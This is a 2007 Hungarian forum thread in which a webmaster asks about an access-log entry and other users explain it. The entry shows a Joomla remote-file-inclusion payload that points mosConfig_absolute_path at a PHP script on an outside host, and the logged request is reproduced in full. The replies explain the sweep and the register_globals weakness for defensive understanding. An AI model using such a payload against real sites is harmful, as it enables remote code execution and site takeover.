ugrás a tartalomhoz

Deface probálkozás

Peti_ · 2007. Júl. 3. (K), 22.31
Ma ezt találtam az access logban:
85.96.230.56 - - [03/Jul/2007:20:54:49 +0200] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.tpcc10.xpg.com.br/tool25.txt? HTTP/1.0" 302 3 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Látott már valaki ilyet?

Mikor wgettel lefutattam ezt kaptam:

HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?: Permission denied

Cannot write to `index.php?_REQUEST=&_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http:%2F%2Fwww.tpcc10.xpg.com.br%2Ftool25.txt?' (Permission denied).
 
1

azt hiszem

Joó Ádám · 2007. Júl. 3. (K), 23.15
Lehet, hogy hülyeséget mondok, de azt hiszem, ez egy Joomla törésre használt kérés.
2

Automatizált támadás

vbence · 2007. Júl. 3. (K), 23.34
Ha megnézed egy webszerver logját, naponta ehhez hasonló sweep-ek százait találhatod. Nem a te szervered a cél egyszerűen csak végigmennek az összes általuk ismert hoston, és próbálkoznak.

Ha belenézel a hivatkozott fájlba: http://www.tpcc10.xpg.com.br/tool25.txt ez egy PHP fájl, tehát a támadás egy remote inclusion-re van alapozva. Mellesleg nagyon ügyes cucc, mindenkinek szolgáljon okulására.
3

register globals off

Hodicska Gergely · 2007. Júl. 5. (Cs), 22.39
A fenti támadás csak bekapcsolt register globals beállítás mellett működhet, akinél ez fennáll, az meg is érdemli...


Üdv,
Felhő
4

hihetetlen

Fekete Ferenc GDA · 2007. Júl. 6. (P), 12.55
Hihetetlen, hogy még ma is próbálkoznak ezzel:) Mert ha most jelent volna meg a php4... de azok az idők már elmúltak.
5

Hiheto

zmb · 2007. Júl. 8. (V), 09.59
Nem az a baj, hogy ilyenekkel probalkoznak, hanem az, hogy sikerulhet. Nem egy - magat php fejlesztonek mondo - embert ismrek, akik a legalapvetobb biztonsagi ovintezkedeseket se teszi meg. Annak koszonhetoen, hogy a PHPval hamar lehet latvanyos eredmenyt produkalni, sokan lekezdik ontani magukbol a scripteket, holott meg a legalapvetobb fogalmakkal se vannak tisztaban.